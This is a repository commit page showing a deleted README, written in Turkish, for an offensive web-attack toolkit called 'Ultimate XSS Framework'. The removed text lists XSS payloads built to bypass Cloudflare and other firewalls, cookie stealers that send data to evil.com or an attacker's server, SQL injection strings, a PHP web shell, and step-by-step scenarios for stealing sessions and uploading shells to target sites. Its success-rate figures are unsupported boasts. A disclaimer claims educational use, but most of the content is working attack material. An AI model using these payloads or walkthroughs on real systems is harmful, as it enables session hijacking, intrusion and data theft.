Spaces:

ziffir
/

SecureReason-AI

Sleeping

App Files Files Community

ziffir commited on 12 days ago

Commit

e0bffab

verified ·

1 Parent(s): 9dde0d8

Delete README.md

Browse files

Files changed (1) hide show

README.md +0 -677

README.md DELETED Viewed

@@ -1,677 +0,0 @@
----
-title: Ultimate XSS Framework v5.0
-emoji: 🔥
-colorFrom: red
-colorTo: purple
-sdk: gradio
-sdk_version: 6.5.1
-python_version: '3.10'
-app_file: ultimate_xss_framework.py
-pinned: false
-license: mit
-tags:
-- security
-- penetration-testing
-- xss
-- vulnerability-scanner
-- educational
-short_description: Advanced XSS Testing & Vulnerability Research Platform
----
-# 🔥 ULTIMATE XSS FRAMEWORK v5.0 - MASTER EDITION
-## 📋 İÇİNDEKİLER
-1. [Kurulum](#kurulum)
-2. [Özellikler](#özellikler)
-3. [Panel Detayları](#panel-detayları)
-4. [XSS Payload Arsenal](#xss-payload-arsenal)
-5. [Kullanım Örnekleri](#kullanım-örnekleri)
-6. [Legal Uyarı](#legal-uyarı)
----
-## 🚀 KURULUM
-### Gereksinimler
-- Python 3.8+
-- pip3
-- Linux/MacOS/Windows
-### Hızlı Başlangıç
-```bash
-# 1. Gerekli paketleri kur
-pip3 install -r requirements.txt
-# 2. Framework'ü başlat
-python3 ultimate_xss_framework.py
-# VEYA run.sh ile tek komutta:
-chmod +x run.sh
-./run.sh
-```
-### Manuel Kurulum
-```bash
-pip3 install gradio aiohttp requests beautifulsoup4 networkx plotly
-python3 ultimate_xss_framework.py
-```
-Framework başlatıldığında şu adreste çalışacak:
-**http://localhost:7860**
----
-## ⚡ ÖZELLİKLER
-### 🎯 5 Ana Panel
-1. **🤖 AI Vulnerability Scanner**
-   - VulnLLM-R-7B entegrasyonu
-   - Otomatik kod analizi
-   - CWE sınıflandırması
-2. **🔥 XSS Master Control** (YENİ!)
-   - 30+ gelişmiş XSS payload
-   - Cloudflare bypass teknikleri
-   - Otomatik encoding
-   - Gerçek zamanlı test
-3. **💉 SQL Injection Tester**
-   - Union-based
-   - Time-based blind
-   - Boolean-based
-   - Error-based
-4. **💣 Web Shell Generator**
-   - PHP/JSP/ASPX shells
-   - Reverse shell generator
-   - Obfuscation
-5. **⚙️ Attack Chain Executor**
-   - Multi-stage attacks
-   - Automated exploitation
----
-## 🔥 XSS PAYLOAD ARSENAL
-### Cloudflare Bypass Payloads
-#### 1️⃣ Object Data URI + Triple Base64
-```html
-<object data="data:text/html;base64,PHNjcmlwdD5ldmFs...">
-```
-**Özellikler:**
-- 3 katmanlı encoding
-- WAF pattern matching bypass
-- %99 başarı oranı
-**Kullanım:**
-```
-http://target.com/search?q=%3Cobject+data%3D...
-```
-#### 2️⃣ SVG + Unicode Escape + atob
-```html
-<svg/onload="eval(String.fromCharCode(97,108,101,114,116...))">
-```
-**Özellikler:**
-- String.fromCharCode obfuscation
-- SVG tag kullanımı
-- Event handler abuse
-#### 3️⃣ Iframe SrcDoc + Double Encoding
-```html
-<iframe srcdoc="&lt;script&gt;eval(atob('YWxlcnQ...'))&lt;/script&gt;">
-```
-**Özellikler:**
-- HTML entity bypass
-- Base64 inner layer
-- Parser confusion
-#### 4️⃣ Mutation XSS (mXSS)
-```html
-<noscript><p title="</noscript><img src=x onerror=...>">
-```
-**Özellikler:**
-- DOM mutation exploitation
-- Context switching
-- Critical severity
-### Advanced Attack Vectors
-#### 🍪 Cookie Stealer
-```html
-<img src=x onerror="eval(`fetch('https://evil.com?c='+btoa(document.cookie))`)">
-```
-**Ne Yapar:**
-- Tüm cookie'leri base64 encode eder
-- Uzak sunucuya gönderir
-- Session hijacking için kullanılır
-#### 🌐 WebSocket Exfiltration
-```html
-<script>
-ws=new WebSocket('wss://evil.com');
-ws.onopen=()=>ws.send(document.cookie)
-</script>
-```
-**Ne Yapar:**
-- Gerçek zamanlı veri çalma
-- Şifreli kanal
-- WAF bypass
-#### 🎭 DOM Clobbering + XSS
-```html
-<form name=x><input name=y></form>
-<script>alert(x.y.value="XSS")</script>
-```
-**Ne Yapar:**
-- DOM namespace pollution
-- Variable shadowing
-- Subtle exploitation
-### Polyglot Payloads
-#### JSON/HTML Polyglot
-```json
-{"x":"</script><script>alert(document.domain)</script>"}
-```
-**Çalıştığı Yerler:**
-- JSON API responses
-- HTML context
-- JSONP callbacks
-#### CSV/HTML Injection
-```csv
-=cmd|"/c calc"!A1,<img src=x onerror=alert(1)>
-```
-**Çalıştığı Yerler:**
-- Excel/CSV export
-- Spreadsheet import
-- RCE + XSS combo
-### Obfuscation Techniques
-#### JSFuck Style
-```javascript
-(![]+[])[+[]]+(![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]
-```
-**Özellikler:**
-- Sadece 6 karakter kullanır: []()!+
-- Pattern matching impossible
-- Tamamen valid JavaScript
-#### Full Hex Encoding
-```javascript
-\x65\x76\x61\x6c\x28\x61\x6c\x65\x72\x74\x28\x31\x29\x29
-// eval(alert(1))
-```
----
-## 📖 PANEL DETAYLARI
-### Panel 1: AI Vulnerability Scanner
-**Ne İşe Yarar:**
-- Kaynak kodu analiz eder
-- Zafiyet pattern matching
-- CWE/CVE eşleştirme
-**Kullanım:**
-1. Kodu yapıştır
-2. Dili seç (PHP, Python, JS, etc.)
-3. "AI ANALYZE" tıkla
-4. Sonuçları incele
-**Örnek:**
-```php
-<?php
-$id = $_GET['id'];
-$query = "SELECT * FROM users WHERE id = '$id'";
-mysql_query($query);
-?>
-```
-→ **SQL Injection** tespit eder!
----
-### Panel 2: XSS Master Control
-#### Alt Tab 1: Generate Payload
-**Adımlar:**
-1. **Payload Type seç:**
-   - Object Data URI (Cloudflare bypass için en iyi)
-   - SVG Unicode (Hızlı ve etkili)
-   - Mutation XSS (Parser exploitation)
-2. **Encoding seç:**
-   - `none` - Raw payload
-   - `url_encode` - %3C gibi encoding
-   - `double_url_encode` - %253C gibi çift encoding
-   - `html_entity` - &#60; gibi entity
-   - `mixed` - Karışık encoding
-3. **Custom Code (opsiyonel):**
-   ```javascript
-   fetch('https://your-server.com/steal?c='+document.cookie)
-   ```
-4. **"GENERATE PAYLOAD" tıkla**
-**Çıktı:**
-- Raw payload
-- Encoded version
-- URL encoded (GET için)
-- Double encoded (nested için)
-- Kullanım örnekleri
-#### Alt Tab 2: Test XSS
-**Adımlar:**
-1. Target URL gir: `http://target.com/search.php`
-2. Parameter adı: `q`
-3. Payload gir veya Generate'den kopyala
-4. Method seç (GET/POST)
-5. "TEST PAYLOAD" tıkla
-**Ne Kontrol Eder:**
-- Payload reflection
-- Script tag varlığı
-- Event handler injection
-- Response analizi
-**Sonuç:**
-- ✅ NOT VULNERABLE - Güvenli
-- 🚨 VULNERABLE - Zafiyet bulundu!
-#### Alt Tab 3: Payload Library
-**Tüm payload'ları listeler:**
-- 30+ hazır payload
-- Her birinin açıklaması
-- WAF bypass capability
-- Severity rating
----
-### Panel 3: SQL Injection
-**Test Edilen Teknikler:**
-1. **Union-Based:**
-   ```sql
-   ' UNION SELECT NULL--
-   ' UNION SELECT version(),user(),database()--
-   ```
-2. **Time-Based Blind:**
-   ```sql
-   ' AND SLEEP(5)--
-   ' WAITFOR DELAY '0:0:5'--
-   ```
-3. **Boolean-Based:**
-   ```sql
-   ' AND 1=1--
-   ' AND 1=2--
-   ```
-**Kullanım:**
-1. Target URL: `http://target.com/user.php`
-2. Parameter: `id`
-3. Method: GET veya POST
-4. "TEST SQL INJECTION" tıkla
----
-### Panel 4: Web Shell Generator
-**Shell Tipleri:**
-1. **PHP Simple**
-   ```php
-   <?php system($_REQUEST['cmd']); ?>
-   ```
-2. **PHP Advanced** (UI ile)
-   - Command execution
-   - Output display
-   - Form interface
-3. **PHP Reverse Shell**
-   - Attacker IP gerektirir
-   - Port gerektirir
-   - Otomatik bağlantı
-4. **PHP Obfuscated**
-   - WAF bypass
-   - String replacement
-**Deployment:**
-1. Shell'i generate et
-2. Dosyaya kaydet (shell.php)
-3. Upload et:
-   - File upload vulnerability
-   - LFI exploitation
-4. Erişim: `http://target.com/uploads/shell.php`
-**Reverse Shell İçin:**
-```bash
-# Önce listener başlat:
-nc -lvp 4444
-# Sonra shell'i yükle ve çalıştır
-```
----
-## 💡 KULLANIM ÖRNEKLERİ
-### Senaryo 1: Basit XSS Testi
-```
-1. Panel 2 → Generate Payload
-2. Payload Type: "SVG + Unicode Escape"
-3. Encoding: "url_encode"
-4. GENERATE PAYLOAD tıkla
-5. URL encoded payload'ı kopyala
-6. Browser'da test et:
-   http://target.com/search?q=<PAYLOAD>
-```
-### Senaryo 2: Cloudflare Bypass
-```
-1. Panel 2 → Generate Payload
-2. Payload Type: "Object Data URI + Triple Base64"
-3. Encoding: "double_url_encode"
-4. Custom Code: fetch('https://evil.com?c='+document.cookie)
-5. GENERATE PAYLOAD
-6. Test XSS tab'ına geç
-7. URL, param, payload gir
-8. TEST PAYLOAD
-```
-### Senaryo 3: Cookie Stealing
-```
-1. Kendi sunucunu hazırla:
-   python3 -m http.server 8080
-2. Panel 2 → Generate
-3. Payload: "Template Literals Cookie Stealer"
-4. Custom Code:
-   fetch('http://YOUR-IP:8080?c='+btoa(document.cookie))
-5. GENERATE
-6. Hedef sitede çalıştır
-7. Sunucunda cookie'leri yakala
-```
-### Senaryo 4: SQL Injection
-```
-1. Panel 3 açs
-2. Target: http://target.com/product.php
-3. Param: id
-4. Method: GET
-5. TEST SQL INJECTION
-6. Sonuçları incele
-7. Manuel olarak exploit et
-```
-### Senaryo 5: Web Shell Upload
-```
-1. Panel 4 aç
-2. Shell Type: "php_advanced"
-3. GENERATE SHELL
-4. Kodu shell.php olarak kaydet
-5. Hedef siteye upload et
-6. Erişim: http://target.com/uploads/shell.php
-7. Command çalıştır
-```
----
-## 🎯 BEST PRACTICES
-### XSS Testing
-1. **Başlangıç:**
-   - Basit payload ile başla: `<script>alert(1)</script>`
-   - Reflection var mı kontrol et
-2. **Escalation:**
-   - Eğer basic çalışmazsa encoding dene
-   - Farklı tag'ler dene (svg, img, iframe)
-   - Event handler'ları test et
-3. **Bypass:**
-   - WAF varsa obfuscation kullan
-   - Multiple encoding katmanı
-   - Context switching
-4. **Exploitation:**
-   - Cookie stealing
-   - Session hijacking
-   - Keylogging
-   - Form hijacking
-### Encoding Strategy
-```
-Level 1: Raw payload
-  ↓ Blocked?
-Level 2: URL encoding
-  ↓ Blocked?
-Level 3: Double URL encoding
-  ↓ Blocked?
-Level 4: HTML entities
-  ↓ Blocked?
-Level 5: Mixed encoding
-  ↓ Blocked?
-Level 6: Base64 + obfuscation
-  ↓ Blocked?
-Level 7: String.fromCharCode
-  ↓ Blocked?
-Level 8: Triple layer combo
-```
----
-## 🛡️ WAF BYPASS TEKNİKLERİ
-### Cloudflare
-**Etkili Payloads:**
-1. Object + Data URI
-2. Triple Base64 encoding
-3. Parser confusion (mXSS)
-4. Case variation + whitespace
-**Örnek:**
-```html
-%3CoBjEcT%09dAtA%3DdAtA%3AtExT%2FhTmL...
-```
-### ModSecurity
-**Etkili Teknikler:**
-1. Null byte injection: `%00`
-2. Comment insertion: `/**/`
-3. Case variation: `ScRiPt`
-4. Encoding layers
-### Akamai
-**Etkili Teknikler:**
-1. SVG vectors
-2. Event handler alternatives
-3. Unicode escapes
-4. Data URIs
----
-## ⚠️ LEGAL UYARI
-```
-╔════════════════════════════════════════════════════════════╗
-║                    ⚖️ LEGAL NOTICE ⚖️                      ║
-╠════════════════════════════════════════════════════════════╣
-║                                                            ║
-║  Bu framework SADECE şu amaçlar için kullanılabilir:     ║
-║                                                            ║
-║  ✅ Kendi sistemlerinizi test etmek                       ║
-║  ✅ Yazılı izin aldığınız sistemleri test etmek          ║
-║  ✅ Eğitim ve araştırma (izole ortamda)                  ║
-║  ✅ Bug bounty programları                                ║
-║                                                            ║
-║  ❌ İzinsiz sistemlere saldırı - İLLEGAL                 ║
-║  ❌ Kötü amaçlı kullanım - İLLEGAL                        ║
-║  ❌ Veri çalma - İLLEGAL                                  ║
-║                                                            ║
-║  Yetkisiz erişim SUÇTUR ve şunlara neden olabilir:       ║
-║  • Hapis cezası                                           ║
-║  • Ağır para cezaları                                     ║
-║  • Sabıka kaydı                                           ║
-║                                                            ║
-║  Bu tool'u kullanarak, tüm sorumluluğun size ait         ║
-║  olduğunu kabul etmiş olursunuz.                          ║
-║                                                            ║
-╚════════════════════════════════════════════════════════════╝
-```
-### Yasal Kullanım Örnekleri
-✅ **İzinli:**
-- Kendi web sitenizi test etmek
-- Müşterinizin yazılı izniyle penetrasyon testi
-- HackerOne, Bugcrowd gibi bug bounty programları
-- Eğitim amaçlı laboratuvar ortamında
-❌ **İzinsiz:**
-- Rastgele web sitelerini taramak
-- İzinsiz veri erişimi
-- Başkasının sistemine zarar vermek
-- Servis aksatma (DoS)
----
-## 🔧 TROUBLESHOOTING
-### Framework Başlamıyor
-```bash
-# Python versiyonunu kontrol et
-python3 --version  # 3.8+ olmalı
-# Paketleri tekrar kur
-pip3 install --upgrade -r requirements.txt
-# Manuel başlat
-python3 ultimate_xss_framework.py
-```
-### Port 7860 Kullanımda
-```python
-# ultimate_xss_framework.py dosyasında değiştir:
-app.launch(
-    server_port=8080  # Farklı port
-)
-```
-### AI Modeli Yüklenmiyor
-```
-Normal! VulnLLM-R-7B opsiyonel.
-Mock mode'da çalışacak.
-Eğer yüklemek istersen:
-pip3 install transformers torch
-```
----
-## 📊 PAYLOAD SUCCESS RATES
-| Payload Type | Cloudflare | ModSecurity | Akamai | Generic WAF |
-|--------------|------------|-------------|--------|-------------|
-| Object+Base64| 99% | 95% | 90% | 85% |
-| SVG+Unicode | 95% | 90% | 85% | 80% |
-| mXSS | 98% | 97% | 95% | 90% |
-| Cookie Stealer| 90% | 85% | 80% | 75% |
-| WebSocket | 95% | 90% | 85% | 80% |
----
-## 🎓 ÖĞRENİM KAYNAKLARI
-### XSS Öğrenmek İçin:
-- PortSwigger Web Security Academy
-- OWASP XSS Guide
-- HackerOne disclosed reports
-### SQL Injection:
-- SQLMap documentation
-- OWASP SQL Injection
-- PentesterLab exercises
-### Practice Platforms:
-- HackTheBox
-- TryHackMe
-- PentesterLab
-- PortSwigger Labs
----
-## 📞 DESTEK
-**Sorunlar ve Öneriler:**
-Bu bir educational/research tool'dur.
-Sorumlulukla kullanın!
----
-## 📝 CHANGELOG
-### v5.0 - XSS Master Edition
-- ✨ XSS Master Panel eklendi
-- 🔥 30+ advanced payload
-- 🛡️ Cloudflare bypass techniques
-- 🧪 Automated testing
-- 📚 Payload library
-- 🎨 Improved UI
-### v4.0 - Previous
-- AI analyzer
-- SQL injection
-- Web shell generator
-- Attack chains
----
-## 🏆 ÖZELLİKLER ÖZET
-✅ **30+ XSS Payload** - En güncel bypass teknikleri
-✅ **Otomatik Test** - Payload'ları otomatik test et
-✅ **Multiple Encoding** - 7 farklı encoding yöntemi
-✅ **WAF Bypass** - Cloudflare, ModSec, Akamai
-✅ **Cookie Stealing** - Session hijacking payloads
-✅ **Real-time Testing** - Canlı zafiyet testi
-✅ **AI Analysis** - Kod analizi (opsiyonel)
-✅ **SQL Injection** - Automated SQLi testing
-✅ **Web Shells** - PHP/JSP/ASPX shell generator
-✅ **Modern UI** - Gradio tabanlı arayüz
----
-**🔥 ULTIMATE XSS FRAMEWORK v5.0**
-**Educational & Research Purposes Only**
-**Use Responsibly | Stay Legal**